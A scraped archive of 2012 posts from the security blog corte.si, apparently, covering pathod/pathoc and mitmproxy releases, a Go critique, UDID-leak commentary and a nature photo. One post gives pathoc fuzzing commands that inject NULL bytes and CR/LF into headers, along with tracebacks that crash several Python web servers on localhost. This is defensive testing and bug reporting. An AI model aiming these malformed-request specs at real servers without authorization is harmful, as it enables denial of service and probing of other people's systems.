    </span>_</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
...
...
    </span>//DoSomething(m)
</span></code></pre>
That should fix it, right? Well, no. It turns out we've previously declared and
used err</strong> (a very common idiom), so this is still a compile error. We're
using the "declare and assign" syntax, but have no new variables on the
left-hand side of the ":=". So we need to make another tweak:</p>
import </span>(
    "</span>io/ioutil</span>"
)
...
...
    </span>_</span>, </span>err </span>= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
...
...
    </span>//DoSomething(m)
</span></code></pre>
Five seconds later, we want to re-enable DoSomething</strong>, and now we have to
unwind the entire process.</p>
The cumulative effect of all this is like trying to write code while someone
next to you randomly knocks your hands off the keyboard every few seconds.
It's a pointlessly pedantic approach that adds constant friction to your
write-compile-test cycle, breaks your flow, and just generally makes life a
little harder for very little benefit. There's no way to turn this mis-feature
off, no flag we can pass to the compiler to temporarily make this a warning
rather than an error while hacking2</a></sup>.</p>
The irony of the situation is that I agree with the sentiment behind this. I
don't want dangling variables or imports in my codebase. And I agree that if
something is worth warning about it's worth making it an error. The mistake is
to confuse the state we want at the conclusion of a unit of hacking3</a></sup>, with
what we need at every point in between, during the write-compile-test cycle.
This cycle is the core of the process of actually producing code, and the
exhilarating sense of weightlessness</a> that you get when
hacking in Python is largely due to the fact that the language works really,
really hard to optimize this process. Go has given away this feeling of
exhilaration, basically for nothing.</p>
Despite all this, it's still possible that the benefits of Go do outweigh its
irritating personality. Interfaces, memory management, first-class concurrency
and static type checking is a knockout combination, and the language in general
has something of the taut practicality that I love in C. So, despite the
rantiness of this post, I'll keep hacking on our project and make sure I
produce a few thousand more lines of code before making a final call on the
language. Look for a project release and a blog post along these lines in the
coming months.</p>
^{1</sup>
Ellipses indicate "an arbitrary amount of intervening code"</p>
</div>
^{2</sup>
I edited this paragraph a bit for tone. I originally accused the Go
documentation of being faintly smug about all of this - which is not fair, and
doesn't add anything to the argument.</p>
</div>
^{3</sup>
Why don't we have a word for this? By "unit of hacking", I mean the work
that goes on between starting to hack on a change-set and doing a commit. At the
beginning and at the end, the code is in a clean state, but in between there
are many periods of transition where cleanliness requirements are relaxed.</p>
</div>}}}


Released: pathod 0.3
2012-11-16T00:00:00+00:00
I've just released pathod 0.3</a>, which beefs up
pathoc</a>'s fuzzing capabilities, improves the
spec language and includes lots of bugfixes and other small tweaks. Get it while
it's hot!</p>
Better fuzzing</h2>
A major focus of this release is to improve
pathoc</a>'s capabilities as a basic fuzzing tool.
I've had fun breaking webservers</a>
with pathoc, and it's even come in handy in my Day Job. Here's a quick summary
of how things have changed.</p>

The -x</strong> flag tells pathoc to explain its requests. This prints out an
expanded pathoc query specification, with all randomly generated content and
query modifications resolved. If you trigger an exception, you can precisely
replay the offending query using this explanation.</li>
The options for outputting requests and responses have been expanded hugely.
First, the -q</strong> and -r</strong> flags tell pathoc to dump complete records of
requests and responses respectively. This data is sniffed by instrumenting
the socket, so is canonical regardless of our ability to interpret returned
data. The -x</strong> option makes pathod dump this data in hexdump format
(otherwise unprintable characters are escaped to preserve your terminal).</li>
A number of options have been added to let you ignore expected responses.
-C</strong> takes a comma-separated list of response codes to ignore. -T</strong>
ignores server timeouts. This lets you hone in on the exceptional responses
that you care about, and ignore the rest.</li>
</ul>
Language improvements</h2>

I've simplified response specifications by making the response message a
standard component with the "r" mnemonic.</li>
I've added the "u" mnemonic to request specifications, as a shortcut for
specifying the User-Agent header:</li>
</ul>
get:/:u"My Weird User-Agent"
</span></code></pre>
We also have a small library of representative User-Agent strings that can be
used instead of specifying your own. For example, this specifies the
GoogleBot User-Agent string:</p>
get:/:ug
</span></code></pre>
The list of available shortcuts are in the docs, and can be listed from the
commandline using the --show-uas</strong> flag to pathoc:</p>
> ./pathoc --show-uas
User agent strings:
   a android
   l blackberry
   b bingbot
   c chrome
   f firefox
   g googlebot
   i ie9
   p ipad
   h iphone
   s safari</pre>
</span></code></pre>


pathoc: break all the Python webservers!
2012-09-27T00:00:00+00:00
A few months ago, I announced pathod</a>, a pathological HTTP
daemon. The project started as a testing tool to let me craft
standards-violating HTTP responses while working on
mitmproxy</a>. It soon became a free-standing project, and
has turned out to be incredibly useful in security testing, exploit delivery and
general creative mischief. In the last release, I added pathoc - pathod's
malicious client-side twin. It does for HTTP requests what pathod does for HTTP
responses, and uses the same hyper-terse specification
language</a>.</p>
In this post, I show how pathoc can be used as a very simple fuzzer, by finding
issues in a number of major pure-Python webservers. None of the tested servers
failed catastrophically - they all caught the unexpected exception and continued
serving requests. None the less, I think it's reasonable to say that we've
triggered a bug if a) the server returns an 500 Internal Server Error response
or terminates the connection abnormally, and b) we see a traceback in our logs.
In fact, by this definition, I found bugs in every</em> pure-Python server I
tested.</p>
All of the problems I list below are simple failures of validation - what they
have in common is that somewhere in the project code is called with input that
it doesn't expect and can't handle.  This matters - in fact, I'd argue that the
majority of security problems fall in this category. It's interesting to ponder
why this type of issue is so ubiquitous in Python servers. I have no doubt that
part the answer lies in Python's use of exceptions - errors that would be
explicit in other languages can be implicit in Python, and code that seems clean
and intuitive might in fact be buggy. I think this is especially relevant right
now, given the recent flurry of discussion surrounding the Go
language</a> and its error handling. It's pretty instructive to
read Russ Cox's recent
riposte</a> to
this
post</a>
criticizing Go's explicit approach, while looking at the bugs below. I love
Python</a> and I think it's a fine language, but I also
think the designers of Go probably made the right choice.</p>
Basic fuzzing with pathoc</h2>
My methodology for these tests was very simple indeed. I launched each server in
turn, and used pathod to fire corrupted GET requests at the daemon until I saw
an error. I then looked at the logs, and boiled the distinct cases down to a
minimal pathoc specification by hand. This exercises a rather shallow set of
features in the server software - mostly parsing of the HTTP lead-in and request
headers. It's possible to give software a much, much deeper workout with pathoc,
but I'll leave that for a future post.</p>
My pathoc fuzzing command looked something like this:</p>
pathoc -n</span> 1000</span> -p</span> 8080</span> -t</span> 1 localhost '</span>get:/:b@10:ir,"\x00"</span>'
</span></code></pre>
The most important flags here are -n</b>, which tells pathoc to make 1000
consecutive requests, and -t</b>, which tells pathoc to time out after one
second (necessary to prevent hangs when daemons terminate improperly). The
request specification itself breaks down as follows:</p>

    
        get</td>
        Issue a GET request</td>
    </tr>
    

        /</td>
        ... to the path / </td>
    </tr>
    

        b@10</td>
        ... with a body consisting of 10 random bytes </td>
    </tr>
    

        ir,"\x00"</td>
        ... and inject a NULL byte at a random location.</td>
    </tr>
</table>
It's that last clause - the random injection - that makes the difference between
simply crafting requests and basic fuzzing. Every time a new request is issued,
the injection occurs at a different location. I varied the injected character
between a NULL byte, a carriage return and a random alphabet letter. Each
exposed different errors in different servers. For a complete description of the
specification language, see the online docs</a>.</p>
Results</h2>
For each bug, I've given a traceback and a minimal pathoc call to trigger the
issue. The tracebacks have been edited lightly to shorten file paths and
remove irrelevances like timestamps.</p>
CherryPy</h3>
pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>'
</span></code></pre>ENGINE ValueError("invalid literal for int() with base 10: 'x'",)
Traceback (most recent call last):
  File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
    req.parse_request()
  File "cherrypy/wsgiserver/wsgiserver2.py", line 591, in parse_request
    success = self.read_request_headers()
  File "cherrypy/wsgiserver/wsgiserver2.py", line 711, in read_request_headers
    if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs:
ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre>pathoc -p</span> 8080 localhost '</span>get:/:i4,"\r"
</span></code></pre>ENGINE TypeError("argument of type 'NoneType' is not iterable",)
Traceback (most recent call last):
  File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
    req.parse_request()
  File "cherrypy/wsgiserver/wsgiserver2.py", line 580, in parse_request
    success = self.read_request_line()
  File "cherrypy/wsgiserver/wsgiserver2.py", line 644, in read_request_line
    if NUMBER_SIGN in path:
TypeError: argument of type 'NoneType' is not iterable
</span></code></pre>Tornado</h3>
pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>'
</span></code></pre>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.
    Traceback (most recent call last):
      File "tornado/iostream.py", line 304, in wrapper
        callback(*args)
      File "tornado/httpserver.py", line 254, in _on_headers
        content_length = int(content_length)
    ValueError: invalid literal for int() with base 10: 'x'
[E 120927 11:42:26 ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012e28e8>
    Traceback (most recent call last):
      File "tornado/ioloop.py", line 421, in _run_callback
        callback()
      File "tornado/iostream.py", line 304, in wrapper
        callback(*args)
      File "tornado/httpserver.py", line 254, in _on_headers
        content_length = int(content_length)
    ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre>pathoc -p</span> 8080 localhost '</span>get:/:h"h\r\n"="x"</span>'
</span></code></pre>[E iostream:307] Uncaught exception, closing connection.
    Traceback (most recent call last):
      File "tornado/iostream.py", line 304, in wrapper
        callback(*args)
      File "tornado/httpserver.py", line 236, in _on_headers
        headers = httputil.HTTPHeaders.parse(data[eol:])
      File "tornado/httputil.py", line 127, in parse
        h.parse_line(line)
      File "tornado/httputil.py", line 113, in parse_line
        name, value = line.split(":", 1)
    ValueError: need more than 1 value to unpack
[E ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012bd7e0>
    Traceback (most recent call last):
      File "tornado/ioloop.py", line 421, in _run_callback
        callback()
      File "tornado/iostream.py", line 304, in wrapper
        callback(*args)
      File "tornado/httpserver.py", line 236, in _on_headers
        headers = httputil.HTTPHeaders.parse(data[eol:])
      File "tornado/httputil.py", line 127, in parse
        h.parse_line(line)
      File "tornado/httputil.py", line 113, in parse_line
        name, value = line.split(":", 1)
    ValueError: need more than 1 value to unpack
</span></code></pre>Twisted</h2>
pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>'
</span></code></pre>[HTTPChannel,4,127.0.0.1] Unhandled Error
  Traceback (most recent call last):
    File "twisted/python/log.py", line 84, in callWithLogger
      return callWithContext({"system": lp}, func, *args, **kw)
    File "twisted/python/log.py", line 69, in callWithContext
      return context.call({ILogContext: newCtx}, func, *args, **kw)
    File "twisted/python/context.py", line 118, in callWithContext
      return self.currentContext().callWithContext(ctx, func, *args, **kw)
    File "twisted/python/context.py", line 81, in callWithContext
      return func(*args,**kw)
  --- <exception caught here> ---
    File "twisted/internet/selectreactor.py", line 150, in _doReadOrWrite
      why = getattr(selectable, method)()
    File "twisted/internet/tcp.py", line 199, in doRead
      rval = self.protocol.dataReceived(data)
    File "twisted/protocols/basic.py", line 564, in dataReceived
      why = self.lineReceived(line)
    File "twisted/web/http.py", line 1558, in lineReceived
      self.headerReceived(self.__header)
    File "twisted/web/http.py", line 1580, in headerReceived
      self.length = int(data)
  exceptions.ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre>SimpleHTTP</h2>
pathoc -p</span> 8080 localhost '</span>get:"/\0"</span>'
</span></code></pre>Exception happened during processing of request from ('127.0.0.1', 54029)
Traceback (most recent call last):
  File "lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock
    self.process_request(request, client_address)
  File "lib/python2.7/SocketServer.py", line 310, in process_request
    self.finish_request(request, client_address)
  File "lib/python2.7/SocketServer.py", line 323, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "lib/python2.7/SocketServer.py", line 638, in __init__
    self.handle()
  File "python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "lib/python2.7/SimpleHTTPServer.py", line 44, in do_GET
    f = self.send_head()
  File "lib/python2.7/SimpleHTTPServer.py", line 68, in send_head
    if os.path.isdir(path):
  File "lib/python2.7/genericpath.py", line 41, in isdir
    st = os.stat(s)
TypeError: must be encoded string without NULL bytes, not str
</span></code></pre>Waitress</h3>
pathoc -p</span> 8080 localhost '</span>get:/:i16," "</span>'
</span></code></pre>ERROR:waitress:uncaptured python exception, closing channel
<waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310>
(
    <type 'exceptions.IndexError'>:list index out of range
        [lib/python2.7/asyncore.py|read|83]
        [lib/python2.7/asyncore.py|handle_read_event|444]
        [lib/python2.7/site-packages/waitress/channel.py|handle_read|169]
        [lib/python2.7/site-packages/waitress/channel.py|received|186]
        [lib/python2.7/site-packages/waitress/parser.py|received|99]
        [lib/python2.7/site-packages/waitress/parser.py|parse_header|158]
        [lib/python2.7/site-packages/waitress/parser.py|get_header_lines|247]
)
</span></code></pre>
Edit: The first version of this post had examples that were due to the test
WSGI application, not waitress. I've replaced them with the traceback above,
which has been reformatted for clarity.</strong></p>
Werkzeug</h3>
pathoc -p</span> 8080 localhost '</span>get:/:h"Host"="n\r\0"</span>'
</span></code></pre>Traceback (most recent call last):
  File "flask/app.py", line 1518, in __call__
    return self.wsgi_app(environ, start_response)
  File "flask/app.py", line 1507, in wsgi_app
    return response(environ, start_response)
  File "/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py", line 1082, in __call__
    app_iter, status, headers = self.get_wsgi_response(environ)
  File "werkzeug/wrappers.py", line 1070, in get_wsgi_response
    headers = self.get_wsgi_headers(environ)
  File "werkzeug/wrappers.py", line 986, in get_wsgi_headers
    headers['Location'] = location
  File "werkzeug/datastructures.py", line 1132, in __setitem__
    self.set(key, value)
  File "werkzeug/datastructures.py", line 1097, in set
    self._validate_value(_value)
  File "werkzeug/datastructures.py", line 1065, in _validate_value
    raise ValueError('Detected newline in header value.  This is '
ValueError: Detected newline in header value.  This is a potential security problem
</span></code></pre>


Limits of data visualization with space filling curves
2012-09-20T00:00:00+00:00
I recently wrote a series</a> of
posts</a> using the Hilbert
curve</a> to visualize binaries,
culminating in a gallery showing regions of high entropy in
malware</a>.</p>

    
        
    </a>
</div>
The fact that the Hilbert curve has excellent locality preservation means that
one dimensional features are preserved (as much as they can be) in the
two-dimensional layout. This lets us visually pick out features of interest, and
makes it possible, for instance, to quickly identify different malware packers
just based on their layout characteristics.</p>
An obvious next step is to ask if it's possible to extend this idea to let us
visually compare binaries, creating a sort of visual diff. Unfortunately, we now
bump our heads against the limitations of space-filling curve visualization. I
made the animation below after a recent conversation along these lines, and I
think it illustrates the main issues nicely. It shows a single contiguous
stretch of data (the black area) being shifted progressively through a binary.
At each timestep, the only thing that changes is the starting location of the
data block:</p>

    
        
    </a>
</div>
Two things are immediately clear:</p>

The block of data doesn't retain its
shape at different offsets - identical stretches of data can look totally
different depending on their locations.</li>
There's no way to quickly see
where</em> in the binary a piece of information lies. Unless you are very familiar
with the particular curve and know its exact orientation, you can't say, for
instance, when the data block lies a third of the way through the binary.</li>
</ul>
It's often worthwhile to trade off these things for locality preservation, but
it definitely scotches certain use cases. I do wonder if it might be possible to
tune the trade-off somewhat - sacrificing some locality preservation for better
shape retention and offset estimation. I've toyed with some ideas along these
lines (see the unrolled layouts in the binary visualization
post</a>), but I still don't have a
satisfying solution. If anyone out there knows of one, drop me a line.</p>


Findng the UDID leak: a guessing game
2012-09-07T00:00:00+00:00
It's become quite a popular parlor game to guess who is responsible for the
recent Antisec UDID leak. I've now seen no less than six separate apps named as
the probable source (two of which came from Marco
Arment</a>). Before we pick the next culprit, I think it's
worth taking a step back to consider the list of things we don't</em> know:</p>

We don't know that we're dealing with just one source. The Antisec dump may
well be an amalgam of data from various sources.</li>
We don't know that we're looking for just one app, or even a set of apps by
one developer. The leak may well come from one of the myriad of 3rd party services
which could be included in thousands of apps.</li>
We don't know that Antisec is being truthful about the scale of the database,
or the additional data they claim is associated with the UDID/APNS records.</li>
We certainly don't know that the data was filched from an FBI laptop or that
the NCFTA was in any way involved.</li>
</ul>
Given all of these unknowns, I think a simple process-of-elimination approach to
tracking down the leak will probably be fruitless, or worse, result in the
finger being pointed at even more innocent parties. The one entity that may
already have the answer to this question is Apple. They have a list of a million
affected UDIDs, and they presumably have records of all apps that have ever used
the associated push tokens. Given a large and precise sample like this, it
should be possible to find the origin(s) of the leak reasonably easily. Indeed,
if Apple is on the ball they may already have done this.</p>
Now for some frank speculation of my own. Let's assume for a moment that Antisec
has been entirely truthful about the data, and that we're dealing with a single
source. In that case, we're looking for:</p>

... an app or third-party service integrated into multiple apps</li>
... with 12 million or more users</li>
... that is APNS-enabled</li>
... which also gathers user data like real names and zip codes.</li>
</ul>
I'll throw my hat in the ring and say that my money is on a third-party service,
not a single app. If my hunch is right, the list of possible culprits is
actually rather short.</p>


The UDID leak is a privacy catastrophe
2012-09-04T00:00:00+00:00
Something I've been worrying about for a long time has just happened: Antisec
has leaked a database with more than a million
UDIDs</a>. The UDID issue has been a bit of a white
whale of mine - I've written many blog posts about it and spent more hours than
I care to think negotiating responsible disclosure with companies misusing
UDIDs. Let's recap some of the posts I've written about this:</p>

In May 2011</a>,
just before its sale to Gree was announced, I showed that
OpenFeint</a> was misusing UDIDs in a way
that allowed you to link a UDID to a user's identity, geolocation and Facebook
and Twitter accounts. I didn't discuss it openly at the time, you could also
completely take over an OpenFeint account, and access chat, forums, friends
lists, and more using just a UDID. This resulted in a class-action lawsuit
against OpenFeint, which has since petered out.</li>
Later that month</a>, I
published a survey looking at how UDIDs are used in practice.
The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li>
In September 2011</a>,
I published the most troubling news so far, which
paradoxically also got the least coverage in the press. I looked at
all</em> the gaming social networks on IOS - basically OpenFeint and its
competitors - and found catastrophic mismanagement by nearly everyone. The
vulnerabilities ranged from de-anonymization, to takeover of the user's gaming
social network account, to the ability to completely take over the user's
Facebook and Twitter accounts using just a UDID.</li>
</ul>
As serious these problems are, I'm afraid it's just the tip of the iceberg.
Negotiating disclosure and trying to convince companies to fix their problems
has taken literally months of my time, so I've stopped publishing on this issue
for the moment. It's disheartening to say it, but some of the companies
mentioned in my posts still</em> have unfixed problems (they were all notified well
in advance of any publication). I will also note ominously that I know of a
number of similar vulnerabilities elsewhere in the IOS app ecosystem that I've
just not had the time to pursue.</p>
When speaking to people about this, I've often been asked "What's the worst
that can happen?". My response was always that the worst case scenario would be
if a large database of UDIDs leaked... and here we are.</p>


Defiler
2012-08-26T00:00:00+00:00
I've been living out of a bag for the last 3 weeks, working hard on a series of
intense but fun audits. After running in high gear for a while I find that I
need a mental palate cleanser - something to help me refocus and stop me from
getting snowblind. I then grab my camera, strap on my macro rig, and walk out
the door to try to catch the local wildlife in the act. It's become a bit of a
game - the aim is to catch creatures in their natural setting and leave them
completely undisturbed when I go, with no posing, prodding or other
disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in
the wind is a fun challenge.</p>
Today I find myself in Sydney, working in a part of the town that is shot
through with unreasonably beautiful walking tracks. The place is also blessed
with a huge diversity of invertebrate life that makes my adopted home
town</a> seem barren by comparison. I walked
along a nearby track until I found a quiet, leafy spot, geared up, and
leopard-crawled through the underbrush. Not long after, I came face-to-face with
this imposing little chap sitting on the tip of a fern frond.</p>

    
        
    </a>
</div>
This is a Lymantriid</a> caterpillar
of some variety, probably one of the tussock moths native to Australia.
"Lymantria" means "defiler" - some species of this family can cause huge damage
to foliage, and are considered to be destructive pests. So much so, that when a
single male Gypsy Moth</a> (Lymantria
dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city
with a caterpillar-specific bacterial
insecticide</a>.</p>
No need for drastic measures with this particular fellow, though - he's native
to this ecosystem, and the only pest is me and my camera. He was head down
munching away when I found him, and paid absolutely no attention to me when I
moved in close to get these shots. He's got reason to be cocksure, too - those
tufts of hair on his back contain hollow, poison-filled spines that can cause a
pretty unpleasant reaction when touched.</p>

    
        
    </a>
</div>
An few hours exploring and photographing is a very effective brain-cleaner,
leaving me ready to deal with spiny, venomous defilers of the digital variety.</p>


pathod 0.2: the daemon gets an evil twin
2012-08-22T00:00:00+00:00
I've just pushed pathod 0.2 out the door. This is a huge release, with many new
features:</p>

pathoc</a>, pathod's evil client-side twin.</li>
libpathod.test</a>, a framework for using pathod in your unit tests.</li>
Improved mini language</a>, including many new abilities and improvements.</li>
A rewrite of the networking core.</li>
</ul>
The project also has a new website at pathod.net</a>. Yes,
pathod is now self-hosting, so you can try out both pathod and pathoc
specifications right on the website. There's also a new public pathod
instance</a>, which I'm sure
everyone will use entirely responsibly.</p>


Introducing pathod: a pathological HTTP server
2012-05-01T00:00:00+00:00
I've just released pathod</a>, a pathological
HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a
tiny, terse language for crafting HTTP responses. It also has a built-in web
interface that lets you play with the response spec language, inspect logs, and
access pathod's full help document.</p>
The rest of this post is a quick teaser showing some of pathod's abilities. See
the detailed documentation on the pathod
site</a> if you want more.</p>
The simplest possible response</h2>
The easiest way to craft a response is to specify it directly in the request
URL. Lets start with the simplest possible example. Start pathod, and then visit
this URL:</p>
http://localhost:9999/p/200
</span></code></pre>
The "/p/" path is the location of the response generator in pathod's default
configuration - everything after that a response specification in pathod's
mini-language.  The general form of a response spec is as follows:</p>
code[MESSAGE]:[colon-separated list of features]
</span></code></pre>
In this case, we're specifying only the HTTP response code - that is, an HTTP
200 OK with no headers and no content, resulting in a response like this:</p>
HTTP/1.1 200 OK
</span></code></pre>Specifying features</h2>
One example of a "feature" is a response header. Lets embellish our response by
adding one:</p>
200:h"Etag"="foo"
</span></code></pre>
The first letter of the feature - "h", in this case - is a mnemonic indicating
the type of feature we're adding. The full response to this spec looks like this:</p>
HTTP/1.1 200 OK
Etag: foo
</span></code></pre>
Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the
response specification language. In this case they are literal values, as
indicated by the fact that they are quoted strings. The Value Specification
syntax also lets us load values from files or generate random data. For
instance, here is a specification that generates 100k of random binary data for
the header value:</p>
200:h"Etag"=@100k
</span></code></pre>
Now, binary data in the header value will probably break things in interesting
ways, but is unlikely to be read by the client as a valid (but over-long)
value. To see if the client really drops off its perch if we feed it a single
100k header, we have to constrain the random data. Here's the same response,
but with data generated only from ASCII letters:</p>
200:h"Etag"=@100k,ascii_letters
</span></code></pre>
pathod has a large number of built-in character classes from which random
data can be generated.</p>
Pauses and Disconnects</h2>
Next, we can disrupt the communications in various ways. At the moment, this
means adding pauses and disconnects to a response. Let's start with an HTTP 404
response with a body consisting of a 100k of random binary data:</p>
404:b@100k
</span></code></pre>
Here's the same response, but with a 120 second pause after sending 100 bytes:</p>
404:b@100k:p120,100
</span></code></pre>
And, the same response again, but with hard disconnect after sending 100 bytes:</p>
404:b@100k:d100
</span></code></pre>
Instead of specifying a time explicitly, we can ask pathod to just randomly
disconnect at a time of its choosing:</p>
404:b@100k:dr
</span></code></pre>
That's it for the teaser - hopefully it's enough to entice you into looking at
pathod</a>'s full documentation.</p>
What's next?</h2>
pathod is an "airport project" - the first draft was written in its
entirety during a 40-hour trip back home from New York (I drew a bad lot in
stopovers). I've now firmed it up a bit, but there's still work to be done. In
the next month, mitmproxy's test suite will move to pathod, after which
there will be a simple, well-documented way to unit test. I also plan to build
out the JSON API (which is used to drive pathod in test suites), and expand the
mini-language with convenient ways  to generate pathological cookies,
authentication headers, SSL errors, and cache control.</p>


mitmproxy 0.8
2012-04-09T00:00:00+00:00

    
        
    </a>
</div>
I'm happy to announce the release of mitmproxy 0.8</a>.
This release has a few major new features, big speedups, and many, many small
bugfixes and improvements. Here are the headlines:</p>
Android interception</h2>
The most prominent new feature is that we now have a supported way to intercept
Android traffic. What's more, we can do this without a cumbersome transparent
proxying rig - see the Android section in the
documentation</a> for the
details. Special thanks goes to Jim Cheetham</a> for
lending me an Android device and helping to get this feature off the ground.</p>
Replacement patterns</h2>
Another exceedingly useful new feature is replacement
patterns</a>. These consist of a
filter, a regular expression and a replacement string, and run continuously
while mitmproxy processes requests and responses. You can pass these either on
the command-line, or using a built-in replacement pattern editor.</p>

    
        
    </a>
</div>
I'm sure you can immediately think of many uses for this flexible feature, but
my favourite is to use it during testing as a way to conveniently inject
complicated exploits into web traffic. I do this by setting a replacement
pattern that swaps a short but likely unique string (say MYXSS) for a long
exploit, and then I use simple interaction and front-end tools like Firebug to
inject exploits into requests manually based on the short string marker.</p>
Improved pretty-printing of request and response contents</h2>
This release of mitmproxy has a completely redesigned subsystem for
pretty-printing request and response bodies. For instance, we now extract EXIF
tags and other basic information to give you something better than a hex dump
when looking at an image:</p>

    
        
    </a>
</div>
We also have much improved HTML indenting (using lxml</a>), and
a built-in JavaScript beautifier (thanks to
JSBeautifier</a>) that teases out compressed and
obfuscated scripts into something readable.</p>
Changelog</h2>

Detailed tutorial for Android interception. Some features that land in
this release have finally made reliable Android interception possible.</li>
Upstream-cert mode, which uses information from the upstream server to
generate interception certificates.</li>
Replacement patterns that let you easily do global replacements in flows
matching filter patterns. Can be specified on the command-line, or edited
interactively.</li>
Much more sophisticated and usable pretty printing of request bodies.
Support for auto-indentation of JavaScript, inspection of image EXIF
data, and more.</li>
Details view for flows, showing connection and SSL cert information (X
keyboard shortcut).</li>
Server certificates are now stored and serialized in saved traffic for
later analysis. This means that the 0.8 serialization format is NOT
compatible with 0.7.</li>
Add a shortcut key ("f") to load the remainder of a request or response body,
if it is abbreviated.</li>
Many other improvements, including bugfixes, and expanded scripting API,
and more sophisticated certificate handling.</li>
</ul>


mitmproxy 0.7
2012-02-27T00:00:00+00:00

    
        
    </a>
</div>
I'm happy to announce the release of mitmproxy 0.7</a>. The
biggest visible change is a new structured editor for headers, query strings
and form fields. Other new feature include a reverse proxy mode, extended
script API that makes many common tasks much easier, and a myriad of
improvements to the interface (including a massive increase in speed).
Everybody still on 0.6 should upgrade - get it here:</p>
mitmproxy-0.7.tar.gz</a> (docs)</a></h2>
You can also now install mitmproxy using pip</a>, like so:</p>
    </span>pip</span> install mitmproxy
</span></code></pre>
In other news, the project has had an amazing month, after a rash of
high-profile results obtained using mitmproxy were published. It started with
Arun Thampi's
discovery</a>
that Path uploads users' address books to their servers. Things snowballed from
there, and for a few days mitmproxy seemed to be everywhere. Similar findings
were made for
Hipster</a>,
The
Verge</a>
did a mitmproxy-driven AddressbookGate expose (including vaguely threatening
background shots of mitmproxy doing its dastardly work), and lots of people said
nice things on Twitter.</p>
To see the impact all of this for the mitmproxy project, you need only look at
the Github page</a> - watchers of the repo
went from about 200 a month a go, to 950 at the time of this post.</p>
Changelog</h2>

New built-in key/value editor. This lets you interactively edit URL query
strings, headers and URL-encoded form data.</li>
Extend script API to allow duplication and replay of flows.</li>
API for easy manipulation of URL-encoded forms and query strings.</li>
Add "D" shortcut in mitmproxy to duplicate a flow.</li>
Reverse proxy mode. In this mode mitmproxy acts as an HTTP server,
forwarding all traffic to a specified upstream server.</li>
UI improvements - use Unicode characters to make GUI more compact,
improve spacing and layout throughout.</li>
Add support for filtering by HTTP method.</li>
Add the ability to specify an HTTP body size limit.</li>
Move to typed netstrings for serialization format - this makes 0.7
backwards-incompatible with serialized data from 0.6!</li>
Significant improvements in speed and responsiveness of UI.</li>
Many minor bugfixes and improvements.</li>
</ul>


OpenBSD in decline?
2012-02-26T00:00:00+00:00
My leisurely Sunday activity today is to set up a new
OpenBSD</a> firewall for my mobile app testing lab. I haven't
done a from-scratch OpenBSD install for years, so I spent some time reading
through the change logs for the last few versions to catch up with what's
changed. Although the project is clearly still making steady, well-engineered
progress, I had the nagging feeling that the rate of change wasn't what it used
to be. So, I pulled some numbers from CVS commit message list
archives</a>, and graphed
them. Here are the number of commits per month from January 2001 to January
2012. The orange line is a simple 12-month moving average:</p>

    
        
    </a>
</div>
Now, we should be cautious about interpreting this - the number of commits
doesn't tell us anything about the quality, importance or magnitude of code
change. Even if it did all of these things, there are other and perhaps better
measures of a project's health. Still, the trend is clear, and suggests a
sustained decline in activity.</p>
I just bought some T-shirts</a> to help support
one of my favourite open source projects. You should too.</p>


Malware
2012-01-05T00:00:00+00:00
Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at binvis.io</a></b></p>
Hover and click for more.</p>}

corte.si

Generative zoology with neural networks

Some personal thoughts on our national tragedy

mitmproxy v1.0.0: Christmas Edition

mitmproxy v0.18

Hobbes

modd: a flexible tool for responding to filesystem change

mitmproxy v0.15

Trawling Github for cookies, bookmarks and browsing history

devd v0.3

mitmproxy: release v0.14

devd v0.2 (and some thoughts on small tools)

devd: a web daemon for developers

Features</h2>

mitmproxy: release v0.13

mitmproxy v0.12.1

mitmproxy: release v0.12 and some project news

Project News</h2> Before we get to the new release, I'd like to give a quick update on some internal project developments.</p> First up, after a somewhat involved process that included a couple of rounds of community voting and much discussion, we have a new logo:</p>

binvis.io - a browser-based tool for visualising binary data

mitmproxy 0.11.2

mitmproxy and pathod 0.11

mitmproxy now supports #gotofail

Exploiting CVE-2014-1266 with mitmproxy

mitmproxy and pathod 0.10

Changelog</h2> Support for multiple scripts and multiple script arguments</li> Easy certificate install through the in-proxy web app, which is now enabled by default</li>

How I Learned to Stop Worrying and Love Golang

mitmproxy and pathod 0.9.2

Introducing choir.io

mitmproxy 0.9.1

Skout: a devastating privacy vulnerability

How mitmproxy works

pathod 0.9

mitmproxy 0.9

Changelog</h2> Upstream certs mode is now the default.</li> Add a WSGI container that lets you host in-proxy web applications.</li> Full transparent proxy support for Linux and OSX.</li>

Google, destroyer of ecosystems

Things I found on GitHub: aspell custom dictionary entries

Things I found on GitHub: pipe chains

Things I found on GitHub: shell history

The trouble with social news

Go: a nice language with an annoying personality

Released: pathod 0.3

pathoc: break all the Python webservers!

Limits of data visualization with space filling curves

Findng the UDID leak: a guessing game

The UDID leak is a privacy catastrophe

Defiler

pathod 0.2: the daemon gets an evil twin

Introducing pathod: a pathological HTTP server

